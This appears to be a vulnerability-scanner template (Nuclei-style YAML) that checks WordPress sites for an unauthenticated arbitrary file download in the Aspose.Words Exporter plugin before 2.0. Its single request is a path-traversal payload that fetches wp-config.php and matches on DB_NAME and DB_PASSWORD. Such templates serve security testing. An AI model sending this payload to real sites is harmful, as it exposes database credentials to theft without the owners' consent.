id: aspose-words-file-download
info:
  name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7869
    - https://wordpress.org/plugins/aspose-doc-exporter
  tags: wordpress,wp-plugin,lfi,aspose
requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and
      - type: status
        status:
          - 200
